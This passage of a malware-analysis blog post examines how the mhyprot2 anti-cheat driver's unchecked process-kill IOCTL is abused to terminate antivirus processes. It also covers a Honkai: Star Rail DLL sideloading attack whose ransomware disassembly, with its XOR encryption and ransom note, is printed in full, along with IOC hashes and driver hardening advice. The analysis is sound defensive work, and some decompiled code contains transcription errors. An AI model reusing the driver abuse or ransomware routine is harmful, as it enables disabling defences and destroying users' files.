        _InterlockedCompareExchange(&amp;v5, <span class="hljs-number">-1</span>, dword_14000A010);
        <span class="hljs-keyword">if</span> ( v5 == <span class="hljs-number">-1</span> )
        {
            <span class="hljs-keyword">if</span> (dword_14000A6FC &lt;= <span class="hljs-number">0</span> )
            {
                ++dword_14000A6FC;
                sub_140997500(<span class="hljs-number">6</span>Dest, <span class="hljs-number">0</span>i64, <span class="hljs-number">256164</span>); <span class="hljs-built_in">sprintf</span>(&amp;Dost, <span class="hljs-number">0x100</span>ui64, <span class="hljs-string">"Status false\r\n"</span>);
                <span class="hljs-built_in">snprintf</span>(&amp;Dest, <span class="hljs-number">0</span>i64, <span class="hljs-number">256</span>i64);
                sub_1409059EC(<span class="hljs-number">0</span>i64, &amp;Dest);
                _InterlockedExchange(&amp;dword_14000A6F8, <span class="hljs-number">1</span>);
            }
        }
        <span class="hljs-keyword">else</span>
        {
            _InterlockedAdd(Gdword_14000A010, OxFFFFFFFF);
            <span class="hljs-keyword">if</span> (v0 &amp; <span class="hljs-number">0x32</span> == <span class="hljs-number">11</span> )
            {
                v3 = <span class="hljs-number">0</span>;
                KdChangeOption(<span class="hljs-number">0</span>i64, <span class="hljs-number">1</span>i64, &amp;v3, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, <span class="hljs-number">0164</span>);
                KdDisableDebugger();
                LOBYTE(KdDebuggerEnabled) = <span class="hljs-number">0</span>;
                <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> _int8)sub_140001490() == <span class="hljs-number">1</span> )
                    _InterlockedExchange(&amp;dword_14009AGEC, <span class="hljs-number">3</span>);
            }
        }
        <span class="hljs-keyword">if</span> ( v0 == <span class="hljs-number">50</span> * (v0 / <span class="hljs-number">0x32</span>) &amp;&amp; ChockForBothObAndALLPsCallbacks() )
            _InterlockedExchange(&amp;dword_14000AGEC, <span class="hljs-number">3</span>);
        <span class="hljs-keyword">if</span> (v0 &amp; Ox1E == <span class="hljs-number">11</span> &amp;&amp; Object )
            KeSetEvent((PREVENT)object, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        MhySleepKernelThread(<span class="hljs-number">100</span>);
        ++v0;
        sub_1400014E00();
        v4 = <span class="hljs-number">1</span>;
        _InterlockedCompareExchange(&amp;v4, <span class="hljs-number">-1</span>, dword_14000A6E8);
    }
    <span class="hljs-keyword">return</span> PsTerminateSystenThread(<span class="hljs-number">0</span>);
</code></pre>
<p>In this context, <code>CheckForBothObAndAllPsCallbacks</code> likely includes the <code>CheckForAllCallbacks</code> function along with additional checks for Object Manager callbacks (<code>ObRegisterCallbacks</code>).</p>
<p>The interesting part is the <code>KdDisableDebugger</code> thats in <code>MhyChecksumForever</code> as this new version of <code>mhyprot</code> implemented kernel debugger detection.</p>
<pre><code class="lang-cpp">        {
            _InterlockedAdd(Gdword_14000A010, OxFFFFFFFF);
            <span class="hljs-keyword">if</span> (v0 &amp; <span class="hljs-number">0x32</span> == <span class="hljs-number">11</span> )
            {
                v3 = <span class="hljs-number">0</span>;
                KdChangeOption(<span class="hljs-number">0</span>i64, <span class="hljs-number">1</span>i64, &amp;v3, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, <span class="hljs-number">0164</span>);
                KdDisableDebugger();
                LOBYTE(KdDebuggerEnabled) = <span class="hljs-number">0</span>;
                <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> _int8)sub_140001490() == <span class="hljs-number">1</span> )
                    _InterlockedExchange(&amp;dword_14009AGEC, <span class="hljs-number">3</span>);
            }
        }
</code></pre>
<p>The call sleeps every 100 seconds until another execution check.</p>
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS __fastcall <span class="hljs-title">MhySleepKernelThreat</span><span class="hljs-params">(<span class="hljs-keyword">int</span> Second)</span>
</span>{
    LARGE_INTERGER Interval; <span class="hljs-comment">// [rsp+38h] [rpb+10h]</span>

    Interval.QuadPart = <span class="hljs-number">-10000</span> * Second;
    <span class="hljs-keyword">return</span> KeDelayExecutionThread(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,&amp;Interval);
}
</code></pre>
<p>Also <code>MhyChecksumForever</code> is created by <code>MhyCreateChecksumThread</code> which calls <code>PsCreateSystemThread</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__int64 <span class="hljs-title">MhyCreateChecksumThread</span><span class="hljs-params">()</span>
</span>{
    __int64 v1; <span class="hljs-comment">// [rsp+40h] [rpb-48h]</span>
    __int64 v2; <span class="hljs-comment">// [rsp+48h] [rpb-40h]</span>
    <span class="hljs-keyword">int</span> v3; <span class="hljs-comment">// [rsp+50h] [rpb-38h]</span>
    __int64 v4; <span class="hljs-comment">// [rsp+58h] [rpb-30h]</span>
    __int64 v5; <span class="hljs-comment">// [rsp+60h] [rpb-28h]</span>
    <span class="hljs-keyword">int</span> v6; <span class="hljs-comment">// [rsp+68h] [rbp-20h]</span>
    __int128 v7; <span class="hljs-comment">// [rsp+70h] [rpb-18h]</span>
    __int64 v8; <span class="hljs-comment">// [rsp+90h] [rpb+8h]</span>

    _InterlockedExchange(&amp;dword_14000A6E8, <span class="hljs-number">0</span>);
    v3 = <span class="hljs-number">48</span>;
    v4 = <span class="hljs-number">0</span>i64;
    v6 = <span class="hljs-number">512</span>;
    v5 = <span class="hljs-number">0</span>i64;
    v8 = <span class="hljs-number">0</span>i64;
    _mm_storeu_si128((__m128i*)&amp;v7,(__m128i)<span class="hljs-number">0</span>i64);
    PsCreateSystemThread(
        (PHANDLE)&amp;v8,
        <span class="hljs-number">0</span>,
        (POBJECT_ATTRIBUTES)&amp;v3,
        <span class="hljs-number">0</span>i64,
        (PCLIENT_ID)&amp;v1,
        (PKSTART_ROUTINE)MhyChecksumForever,
        <span class="hljs-number">0</span>i64);
    <span class="hljs-keyword">return</span> PsLookupThreadByThreadId(v2, &amp;gChecksumThreadHandle);
}
</code></pre>
<h3 id="heading-process-termination">Process Termination</h3>
<p>The process termination functionality in mhyprot2 is implemented through a specific IOCTL (Input/Output Control) handler. This feature allows the anti-cheat system to terminate processes, which can be used to stop cheat tools or compromised game instances.</p>
<pre><code class="lang-c">PAGE:FFFFF800188CD0F9 cmp ebx, <span class="hljs-number">81034000</span>h    <span class="hljs-comment">// Compare the IOCTL code with 0x81034000</span>
PAGE:FFFFF800188CD0FF jz <span class="hljs-keyword">short</span> loc_FFFFF800188CD16C  <span class="hljs-comment">// Jump if equal</span>

PAGE:FFFFF800188CD16C loc_FFFFF800188CD16C:  ; CODE XREF: sub_FFFFF800188CD000+FF↑j
PAGE:FFFFF800188CD16C mov rax, [rsp+<span class="hljs-number">30</span>h]    <span class="hljs-comment">// Load pointer to input buffer</span>
PAGE:FFFFF800188CD171 mov ecx, [rax]        <span class="hljs-comment">// Load process ID from input buffer</span>
PAGE:FFFFF800188CD173 call sub_FFFFF800188C36A8  <span class="hljs-comment">// Call process termination function</span>
PAGE:FFFFF800188CD178 <span class="hljs-keyword">and</span> dword ptr [rbp+<span class="hljs-number">1</span>D0h+arg_20], <span class="hljs-number">0</span>
</code></pre>
<p>This code segment compares the provided IOCTL code with <code>0x81034000</code>. If they match, it jumps to the handler for this specific IOCTL. The handler then loads the process ID from the input buffer and then calls a subroutine (<code>sub_FFFFF800188C36A8</code>) to handle the process termination.</p>
<p>In the <code>sub_FFFFF800188C36A8</code> at the <code>.text</code> segment checks if the provided process ID (<code>ecx</code>) is non-null. If the process ID is null, it jumps to the return statement, effectively ending the function. But this validation routine lacks further checks, such as whether the caller has the right to terminate the specified process.</p>
<pre><code class="lang-c">.text:FFFFF800188C36B0 sub_FFFFF800188C36B0 proc near
.text:FFFFF800188C36B0
.text:FFFFF800188C36B0 var_38          = qword ptr <span class="hljs-number">-38</span>h
.text:FFFFF800188C36B0 var_30          = byte ptr <span class="hljs-number">-30</span>h
.text:FFFFF800188C36B0 var_28          = qword ptr <span class="hljs-number">-28</span>h
.text:FFFFF800188C36B0 var_18          = byte ptr <span class="hljs-number">-18</span>h
.text:FFFFF800188C36B0 arg_0           = qword ptr  <span class="hljs-number">8</span>
.text:FFFFF800188C36B0 Object          = qword ptr  <span class="hljs-number">10</span>h
.text:FFFFF800188C36B0 Handle          = qword ptr  <span class="hljs-number">18</span>h
.text:FFFFF800188C36B0 arg_18          = qword ptr  <span class="hljs-number">20</span>h
.text:FFFFF800188C36B0
.text:FFFFF800188C36B0 ; __unwind { <span class="hljs-comment">// __C_specific_handler</span>
.text:FFFFF800188C36B0 test ecx, ecx   <span class="hljs-comment">// Check if process ID is non-null</span>
.text:FFFFF800188C36B2 jz locret_FFFFF800188C3779  ; If null, <span class="hljs-keyword">return</span>
</code></pre>
<p>The actual process termination is performed using the <code>ZwTerminateProcess</code> function.</p>
<pre><code class="lang-c">.text:FFFFF800188C3733 loc_FFFFF800188C3733:
.text:FFFFF800188C3735 mov rcx, [rsp+<span class="hljs-number">58</span>h+Handle]  <span class="hljs-comment">// Load process handle</span>
.text:FFFFF800188C373A call cs:ZwTerminateProcess <span class="hljs-comment">// Call ZwTerminateProcess</span>
</code></pre>
<p>We can leverage the lack of checks here with a specially crafted request, using the specific IOCTL code and a target process ID. Since this IOCTL handler has a payload encryption measure, attackers would need to encrypt the payload.</p>
<p>This is exactly the same method detailed in the Trendmicro report, with the threat actor loading <code>mhyprot2.sys</code> <em>using the NtOpenFile</em> function.</p>
<pre><code class="lang-cpp">ConsoleWindow = GetConsoleWindow();
ShowWindow(ConsoleWindow,<span class="hljs-number">0</span>);
v4 = <span class="hljs-number">0</span>;
<span class="hljs-keyword">if</span> (!sub_1331000())
{
    <span class="hljs-built_in">memset</span>(Dst, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(Dst));
    wcscpy_s(Dst, <span class="hljs-number">0x100</span>u, <span class="hljs-string">L"\\Device\\"</span>);
    wcscat_s(Dst, <span class="hljs-number">0x100</span>u, mhyprot2);
    <span class="hljs-built_in">memset</span>(&amp;ServiceStatus.dwCurrentState,<span class="hljs-number">0</span>,<span class="hljs-number">24</span>);
    ServiceStatus.dwCurrentState = <span class="hljs-number">24</span>;
    v13 = <span class="hljs-number">2</span> * wcslen(Dst);
    v12 = v13;
    BytesReturned = Dst;
    ServiceStatus.dwWin32ExitCode = &amp;v12;
    v5 = NtOpenFile(&amp;Handle, <span class="hljs-number">0xC0100000</span>, &amp;ServiceStatus.dwCurrentState, &amp;IoStatusBlock, <span class="hljs-number">0</span>, <span class="hljs-number">3u</span>);
}
</code></pre>
<p>Afterwards, it seems to scan the common processes that are related to Antivirus or Endpoint Detection suites. The list of targeted processes will then be passed to <code>mhyprot2</code> using the <code>DeviceIoControl</code> function and uses control code <code>0x81034000</code> to instruct the driver to terminate the processes in the list on all threads using the <code>ZwTerminateProcess</code> function.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// DeviceIoControl function</span>
    sub_1333979(v7);
<span class="hljs-keyword">if</span>(DeviceIoControl(Handle_to_myprot2, <span class="hljs-number">0x81034000</span>, &amp;InBuffer, <span class="hljs-number">0xC</span>u, &amp;OutBuffer, <span class="hljs-number">0xC</span>u, &amp;BytesReturned, <span class="hljs-number">0</span>))

<span class="hljs-comment">// The mhyprot2.sys case function</span>
<span class="hljs-keyword">case</span> <span class="hljs-number">0x8103400</span>:
    sub_1400036A8(*v34);
    LODWORD(a5) = <span class="hljs-number">0</span>;

<span class="hljs-keyword">if</span> (ProcessId)
{
    ProcessHandle = <span class="hljs-number">0</span>i64;
    Object = <span class="hljs-number">0</span>i64;
    v1 = PsLookupProcessByProcessId(ProcessId,&amp;Object) &gt;= <span class="hljs-number">0</span>;
    <span class="hljs-keyword">if</span>(Object)
    {
        <span class="hljs-keyword">if</span>(ObOpenObjectByPointer(Object,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>i64,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>i64,<span class="hljs-number">0</span>,&amp;ProcessHandle))
        {
            <span class="hljs-keyword">if</span>(v1)
                ObDeferenceObject(Object);
        }
        <span class="hljs-keyword">else</span>

<span class="hljs-comment">// ZwTerminateProcess inside 0x81034000, which terminates a process and all of its threads</span>
        {
            ZwTerminateProcess(ProcessHandle,<span class="hljs-number">0</span>);
            ZwClose(ProcessHandle);
            <span class="hljs-keyword">if</span>(v1 &amp;&amp; Object)
                ObDeferenceObject(Object);
        }
    }
}
</code></pre>
<p>Indicators of Compromise (IOC)</p>
<ul>
<li><p>avg.msi <code>274685C591E96CB1F9CAE91EC8E7073F3A4CB113</code></p>
</li>
<li><p>avg.exe <code>D4FFD891B9FC1AE212489ABBA43D76E2D58E6782</code></p>
</li>
<li><p>svchost.exe <code>F47D9EC9C2515761E2BC40287B299420A86AF6AB</code></p>
</li>
<li><p>logon.bat <code>1ED1174E6E5545AAA081A480156485156B9D3A13</code></p>
</li>
<li><p>HelpPane.exe <code>2CF9376B057E187B9F465BDAF1C50FDBA9BA66E6</code></p>
</li>
<li><p>kill_svc.exe <code>ccb219be156551464a2b91dfc5cddaf0c3e8321f</code></p>
</li>
<li><p>b.bat <code>7617511adda7cb03f317f0df61624b5ecbffcd87</code></p>
</li>
</ul>
<p>Vulnerable Driver (BYOVD)</p>
<ul>
<li>mhyprot2.sys <code>0466E90BF0E83B776CA8716E01D35A8A2E5F96D3</code></li>
</ul>
<p>To address the IOCTL vulnerability in mhyprot2's process termination functionality, several security measures should be implemented as recommended by Microsoft. When defining new IOCTL codes, it's crucial to specify a <code>FunctionCode</code> value that is equal to or greater than <code>0x800</code>. Additionally, always specify a <code>RequiredAccess</code> value, as this allows the I/O manager to prevent IOCTL calls from users with insufficient access rights. It's important to avoid defining IOCTL codes that allow callers to read or write nonspecific areas of kernel memory.</p>
<p>In the driver's dispatch routines, it's essential to test the entire 32-bit value when examining received IOCTL codes. For enhanced security, drivers can utilize <code>IoValidateDeviceIoControlAccess</code> to perform stricter access checking dynamically, beyond what is specified by the RequiredAccess value in the IOCTL definition.</p>
<p>Buffer validation is a critical aspect of secure IOCTL processing. Never read or write more data than the buffer pointed to by <code>Irp-&gt;AssociatedIrp.SystemBuffer</code> can contain. Always check <code>Parameters.DeviceIoControl.InputBufferLength</code> or <code>Parameters.DeviceIoControl.OutputBufferLength</code> in the <code>IO_STACK_LOCATION</code> structure to determine buffer limits. For added security, always zero driver-allocated buffers that will contain data intended for the application that originated the IOCTL request. This precaution prevents accidental copying of sensitive data to the application.</p>
<p>For <code>METHOD_IN_DIRECT</code> and <code>METHOD_OUT_DIRECT</code> transfers, additional checks are necessary. It's important to check for a <code>NULL</code> return value from <code>MmGetSystemAddressForMdlSafe</code>, which indicates that mapping failed or that a zero-length buffer was supplied. For <code>METHOD_NEITHER</code> transfers, follow the specific rules provided in the "Using Neither Buffered Nor Direct I/O" documentation.</p>
<p>To further enhance security, consider applying explicit security descriptors when the driver is installed. In an INF file, security descriptors are described by the "Security" entry in the AddReg section. The security descriptor should be defined using the Security Descriptor Definition Language (SDDL), which includes specifications for the owner SID, group SID, discretionary access control list (DACL), and system access control list (SACL).</p>
<p>When creating a named device object, drivers can control the security settings of specific objects by using the <code>IoCreateDeviceSecure</code> function. This function allows the application of a security descriptor to the device object using a subset of the full SDDL that is appropriate for device objects. The purpose of applying specific security descriptors to device objects is to ensure that appropriate security checks are performed whenever an application attempts to access the device itself.</p>
<p>For devices that do not support name structure, it's important to set the <code>FILE_DEVICE_SECURE_OPEN</code> bit in the device characteristics field. This ensures that the I/O manager performs a full security check on the device object. Failing to set this bit correctly is a common bug in drivers and can allow inappropriate access to the device.</p>
<h1 id="heading-honkai-star-rail-dll-sideloading-kransom-ransomware">Honkai : Star Rail DLL Sideloading (Kransom Ransomware)</h1>
<p>In September 2024, ANYRUN discovered a threat actor using an altered install of Honkai Star Rail to perform a DLL sideloading attack. It starts with <code>StarRail.exe</code> which is a signed binary by COGNOSPHERE PTE LTD (a subsidiary of HoYoverse and MiHoYo). The game itself needs admin privileges to run, as with most games especially those with kernel-level anticheats.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1725818181116/22d14c2d-9edf-4d44-baf5-c8f60446ba97.png" alt class="image--center mx-auto" /></p>
<p>We can see how Honkai Star Rail was succeptible to DLL sideloading by examining the binary using dumpbin.exe on Visual Studio 2022 with the <code>C++ Profiling Tools</code> package enabled.</p>
<pre><code class="lang-c">C:\Program Files\Microsoft Visual Studio\<span class="hljs-number">2022</span>\Community\VC\Tools\MSVC\<span class="hljs-number">14.41</span><span class="hljs-number">.34120</span>\bin\Hostx86\x86&gt;dumpbin.exe /imports C:\Users\user\Desktop\test\StarRail.<span class="hljs-function">exe
<span class="hljs-title">Microsoft</span> <span class="hljs-params">(R)</span> COFF/PE Dumper Version 14.41.34120.0
<span class="hljs-title">Copyright</span> <span class="hljs-params">(C)</span> Microsoft Corporation.  All rights reserved.


Dump of file C:\Users\user\Desktop\test\StarRail.exe

File Type: EXECUTABLE IMAGE
LINK : warning LNK4078: multiple '.ace' sections found with different <span class="hljs-title">attributes</span> <span class="hljs-params">(E0000020)</span>

  Section contains the following imports:

    StarRailBase.dll
             1400A6AC1 Import Address Table
             1400A6AF9 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

                             Ordinal     1

  Summary

        3000 .ace
       A3000 .ace</span>
</code></pre>
<p>This output suggests that <code>StarRail.exe</code> is a relatively simple executable that relies on <code>StarRailBase.dll</code> for most of its functionality. The use of ordinal imports and the presence of <code>.ace</code> sections (which are not standard in typical Windows executables) indicate this might be a custom or protected executable format. ACE relates probably to Anti Cheat Expert.</p>
<p>In Windows, Microsoft has documented the process on how programs typically search for DLL's on its official documentation on <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order">dynamic-link library search order</a> which states that...</p>
<blockquote>
<p>If safe DLL search mode is enabled, then the search order is as follows:</p>
<ol>
<li><p>DLL Redirection.</p>
</li>
<li><p>API sets.</p>
</li>
<li><p>SxS manifest redirection.</p>
</li>
<li><p>Loaded-module list.</p>
</li>
<li><p>Known DLLs.</p>
</li>
<li><p><strong>Windows 11, version 21H2 (10.0; Build 22000), and later</strong>. The package dependency graph of the process. This is the application's package plus any dependencies specified as <code>&lt;PackageDependency&gt;</code> in the <code>&lt;Dependencies&gt;</code> section of the application's package manifest. Dependencies are searched in the order they appear in the manifest.</p>
</li>
<li><p>The folder from which the application loaded.</p>
</li>
<li><p>The system folder. Use the <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya"><strong>GetSystemDirectory</strong></a> function to retrieve the path of this folder.</p>
</li>
<li><p>The 16-bit system folder. There's no function that obtains the path of this folder, but it is searched.</p>
</li>
<li><p>The Windows folder. Use the <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya"><strong>GetWindowsDirectory</strong></a> function to get the path of this folder.</p>
</li>
<li><p>The current folder.</p>
</li>
<li><p>The directories that are listed in the <code>PATH</code> environment variable. This doesn't include the per-application path specified by the <strong>App Paths</strong> registry key. The <strong>App Paths</strong> key isn't used when computing the DLL search path.</p>
</li>
</ol>
</blockquote>
<p>Safe DLL Search Mode was introduced as a security feature starting with <strong>Windows XP Service Pack 1</strong> and <strong>Windows Server 2003</strong>. This feature is designed to prevent <strong>DLL hijacking</strong> by altering the search order for DLLs. Specifically, it prioritizes system directories (like <code>System32</code>) over the current working directory, thus making it more difficult for attackers to place malicious DLLs in easy-to-access directories.</p>
<p>Before Safe DLL Search Mode, Windows would search the current working directory earlier, which made it easier for attackers to exploit DLL hijacking vulnerabilities. The introduction of Safe DLL Search Mode greatly reduced this risk by switching the order in which directories are searched, providing protection against this type of attack​</p>
<p>While this reduces the risk, it does not eliminate all vulnerabilities, especially if an attacker gains access to directories that are still part of the search order, like the application directory. This is where <code>StarRailBase.dll</code> comes into play, as the DLL is located in the same directory as the game.</p>
<p>The threat actor seems to have provided a mirror to Honkai (weird because usually they target paid games through cracks, not free-to-play games) and replaced <code>StarRailBase.dll</code> with a malicious version. Note that the game will execute this DLL, but it cannot launch with this DLL and will return an error saying it could not find the DLL.</p>
<p>The malware's entry point is an exported function named "K". This function is likely called by the game when it attempts to load the legitimate DLL. This function sets up the stack, initializes the file search with the user's directory, and then jumps to the main encryption routine.</p>
<pre><code class="lang-c"><span class="hljs-keyword">public</span> K
K proc near
sub rsp, <span class="hljs-number">28</span>h      <span class="hljs-comment">// Allocate 40 bytes on the stack</span>
lea rcx, aCUsers  <span class="hljs-comment">// Load effective address of "C:\Users" string into rcx</span>
call sub_18000113C  <span class="hljs-comment">// Call function to search for files</span>
add rsp, <span class="hljs-number">28</span>h      <span class="hljs-comment">// Clean up the stack</span>
jmp sub_18000102C   <span class="hljs-comment">// Jump to another function (likely for file encryption)</span>
K endp
</code></pre>
<p>The malware searches for files in the user's directory using Windows API functions. It starts in the user's AppData folder and recursively searches for all files.</p>
<pre><code class="lang-c">sub_18000113C proc near
    <span class="hljs-comment">// Function prologue and stack setup</span>
    mov [rsp<span class="hljs-number">-8</span>+arg_0], rbx
    mov [rsp<span class="hljs-number">-8</span>+arg_8], rdi
    push rbp
    lea rbp, [rsp<span class="hljs-number">-280</span>h]
    sub rsp, <span class="hljs-number">380</span>h
    mov rdi, rcx  ; <span class="hljs-function">Store the input <span class="hljs-title">parameter</span> <span class="hljs-params">(likely the search path)</span>

    <span class="hljs-comment">// Get the user's AppData folder path</span>
    <span class="hljs-keyword">xor</span> r9d, r9d        </span>; dwFlags = <span class="hljs-number">0</span>
    lea rax, [rsp+<span class="hljs-number">148</span>h+String2]
    mov [rsp+<span class="hljs-number">148</span>h+pszPath], rax  ; pszPath = buffer <span class="hljs-keyword">for</span> path
    <span class="hljs-keyword">xor</span> r8d, r8d        ; hToken = <span class="hljs-literal">NULL</span>
    <span class="hljs-keyword">xor</span> ecx, ecx        ; hwnd = <span class="hljs-literal">NULL</span>
    lea edx, [r9+<span class="hljs-number">1</span>Ah]   ; csidl = <span class="hljs-number">0x1A</span> (CSIDL_APPDATA)
    call cs:SHGetFolderPathA

    <span class="hljs-comment">// Construct search path by appending "\*" to user path</span>
    lea rdx, asc_180002084  ; <span class="hljs-string">"\\*"</span>
    lea rcx, [rbp+<span class="hljs-number">280</span>h+String1]  ; lpString1 = user path
    call cs:lstrcatA  ; Append <span class="hljs-string">"\\*"</span> to user path

    <span class="hljs-comment">// Start file search</span>
    lea rdx, [rsp+<span class="hljs-number">380</span>h+FindFileData]  ; lpFindFileData
    lea rcx, [rbp+<span class="hljs-number">280</span>h+String1]  ; lpFileName = search path
    call cs:FindFirstFileA

    mov rbx, rax  ; Store file handle

    <span class="hljs-comment">// Check if file handle is valid</span>
    cmp rax, <span class="hljs-number">0F</span>FFFFFFFFFFFFFFFh
    jz <span class="hljs-keyword">short</span> loc_18000121F  ; Jump to end <span class="hljs-keyword">if</span> invalid handle
</code></pre>
<p>This function uses <code>SHGetFolderPathA</code> to get the user's AppData folder, then uses <code>FindFirstFileA</code> and <code>FindNextFileA</code> to iterate through all files. For each file found, the malware opens it, reads its content, encrypts it, and writes it back to disk.</p>
<p>The encryption is a simple XOR operation with the key 0xAA. While not cryptographically secure, it's enough to render files unreadable. The encryption is a simple XOR operation with the key 0xAA. While not cryptographically secure, it's enough to render files unreadable.</p>
<pre><code class="lang-c">sub_18000128C proc near
    mov [rsp<span class="hljs-number">-8</span>+arg_0], rbx
    push rbp
    push rsi
    push rdi
    push r14
    push r15
    lea rbp, [rsp<span class="hljs-number">-10050</span>h]
    mov eax, <span class="hljs-number">10150</span>h
    call __alloca_probe
    sub rsp, rax
    mov rsi, rcx  <span class="hljs-comment">// Store filename pointer</span>

    <span class="hljs-comment">// Check if file already has .k extension</span>
    call cs:lstrlenA
    cmp eax, <span class="hljs-number">2</span>
    jl <span class="hljs-keyword">short</span> loc_1800012CF
    cdqe
    cmp byte ptr [rax+rsi<span class="hljs-number">-2</span>], <span class="hljs-number">2</span>Eh ; <span class="hljs-string">'.'</span>
    jnz <span class="hljs-keyword">short</span> loc_1800012CF
    cmp byte ptr [rax+rsi<span class="hljs-number">-1</span>], <span class="hljs-number">6B</span>h ; <span class="hljs-string">'k'</span>
    jz loc_1800013E2  <span class="hljs-comment">// Skip if already encrypted</span>

loc_1800012CF:
    <span class="hljs-comment">// Open the file</span>
    <span class="hljs-keyword">and</span> [rsp+<span class="hljs-number">10170</span>h+var_10140], <span class="hljs-number">0</span>
    <span class="hljs-keyword">xor</span> r9d, r9d  ; lpSecurityAttributes = <span class="hljs-literal">NULL</span>
    mov [rsp+<span class="hljs-number">10170</span>h+dwFlagsAndAttributes], <span class="hljs-number">80</span>h  ; FILE_ATTRIBUTE_NORMAL
    mov edx, <span class="hljs-number">0</span>C0000000h  ; GENERIC_READ | GENERIC_WRITE
    mov rcx, rsi  ; lpFileName
    mov [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">3</span>  ; OPEN_EXISTING
    lea r8d, [r9+<span class="hljs-number">1</span>]  ; dwShareMode = FILE_SHARE_READ
    call cs:CreateFileA

    mov r14, rax  ; Store file handle
    cmp rax, <span class="hljs-number">0F</span>FFFFFFFFFFFFFFFh
    jz loc_1800013E2  ; Jump <span class="hljs-keyword">if</span> file open failed

    <span class="hljs-comment">// Initialize encryption loop variables</span>
    <span class="hljs-keyword">and</span> dword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove], <span class="hljs-number">0</span>
    <span class="hljs-keyword">xor</span> eax, eax
    mov dword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove+<span class="hljs-number">4</span>], eax
    <span class="hljs-keyword">xor</span> r15d, r15d
    mov rbx, qword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove]

loc_180001320:  <span class="hljs-comment">// Start of encryption loop</span>
    <span class="hljs-comment">// Read file content</span>
    <span class="hljs-keyword">and</span> qword ptr [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">0</span>
    lea r9, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesRead]  
    mov r8d, <span class="hljs-number">10000</span>h  
    lea rdx, [rbp+<span class="hljs-number">10070</span>h+Buffer]  
    mov rcx, r14  <span class="hljs-comment">// hFile</span>
    call cs:ReadFile

    test eax, eax
    jz <span class="hljs-keyword">short</span> loc_1800013AB  <span class="hljs-comment">// Jump if read failed</span>
    mov eax, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesRead]
    test eax, eax
    jz <span class="hljs-keyword">short</span> loc_1800013AB  <span class="hljs-comment">// Jump if no bytes read</span>

    <span class="hljs-comment">// Prepare for encryption</span>
    mov edi, <span class="hljs-number">80000</span>h
    lea rcx, [rbp+<span class="hljs-number">10070</span>h+Buffer]
    sub rdi, r15
    cmp rax, rdi
    cmovb rdi, rax
    mov rdx, rdi
    call sub_180001400  <span class="hljs-comment">// Call encryption function (XOR)</span>

    <span class="hljs-comment">// Set file pointer back</span>
    mov rdx, rbx  
    mov rcx, r14  
    <span class="hljs-keyword">xor</span> r9d, r9d  
    <span class="hljs-keyword">xor</span> r8d, r8d  
    call cs:SetFilePointerEx

    <span class="hljs-comment">// Write encrypted content back to file</span>
    <span class="hljs-keyword">and</span> qword ptr [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">0</span>
    lea r9, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesWritten]  
    mov r8d, edi
    lea rdx, [rbp+<span class="hljs-number">10070</span>h+Buffer]
    mov rcx, r14 
    call cs:WriteFile

    <span class="hljs-comment">// Update loop variables and continue if not finished</span>
    add rbx, rdi
    add r15, rdi
    cmp r15, <span class="hljs-number">80000</span>h
    jb loc_180001320

loc_1800013AB:  <span class="hljs-comment">// Cleanup and rename file</span>
    mov rcx, r14  
    call cs:CloseHandle

    <span class="hljs-comment">// Rename file (add .k extension)</span>
    mov rdx, rsi  <span class="hljs-comment">// lpString2 (original filename)</span>
    lea rcx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpString1 (buffer for new name)</span>
    call cs:lstrcpyA

    lea rdx, aK_0  <span class="hljs-comment">// ".k"</span>
    lea rcx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpString1 (buffer with new name)</span>
    call cs:lstrcatA

    lea rdx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpNewFileName</span>
    mov rcx, rsi  <span class="hljs-comment">// lpExistingFileName</span>
    call cs:MoveFileA

loc_1800013E2:  <span class="hljs-comment">// Function epilogue</span>
    mov rbx, [rsp+<span class="hljs-number">10170</span>h+arg_0]
    add rsp, <span class="hljs-number">10150</span>h
    pop r15
    pop r14
    pop rdi
    pop rsi
    pop rbp
    retn
sub_18000128C endp

<span class="hljs-comment">// XOR encryption function</span>
sub_180001400 proc near
    test rdx, rdx
    jz <span class="hljs-keyword">short</span> locret_180001411

loc_180001405:
    <span class="hljs-keyword">xor</span> byte ptr [rcx], <span class="hljs-number">0</span>AAh
    inc rcx
    sub rdx, <span class="hljs-number">1</span>
    jnz <span class="hljs-keyword">short</span> loc_180001405

locret_180001411:
    retn
sub_180001400 endp
</code></pre>
<p>At the end, the malware includes a hardcoded message.</p>
<pre><code class="lang-c">RansomMessage:
    db <span class="hljs-string">"I believe you encountered some problems. "</span>
    db <span class="hljs-string">"Email to to hoyoverse for solutions."</span>
</code></pre>
